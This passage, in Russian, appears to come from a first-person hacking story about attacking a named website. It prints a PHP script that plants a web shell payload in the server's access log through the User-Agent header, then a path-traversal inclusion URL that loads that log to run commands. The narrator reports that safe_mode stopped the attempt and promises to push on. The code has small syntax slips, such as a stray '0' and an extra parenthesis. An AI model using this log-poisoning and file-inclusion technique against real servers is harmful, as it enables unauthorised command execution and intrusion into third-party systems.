Первые успехи
Если локальный шелл никаким образом залить нельзя, то отчего же не внедрить нужный код прямо в лог, а потом заинклудить его с помощью уже известной баги? Итак, сооружаем небольшой php-скрипт для отсылки нужного нам кода:
<?
$site='i.tjat.com'; //адрес сайта
$path='/'; //путь к уязвимому скрипту
$inject='<? system($_GET[cmd]) ?>'; //php-инъекция
$fp = fsockopen($site, 80, $errno, $errstr, 30))
$out = "GET $path HTTP/1.1\r\n";
0$out .= "Host: $site\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $inject\r\n\r\n";
fwrite($fp, $out);
fclose($fp);
?>
Запустив этот скрипт у себя на локалхосте и убедившись в том, что он сработал, я соорудил ядовитую ссылку:
http://wap.tjat.com/?lang=ru/../../../../../../../../../../../../../usr/local/apache/logs/imode_icq.com-access_log
Перейдя по ней, я крупно обломался, поскольку на сервере был включен php safe_mode. Но, как ты догадываешься, дорогой читатель, это меня не остановило

.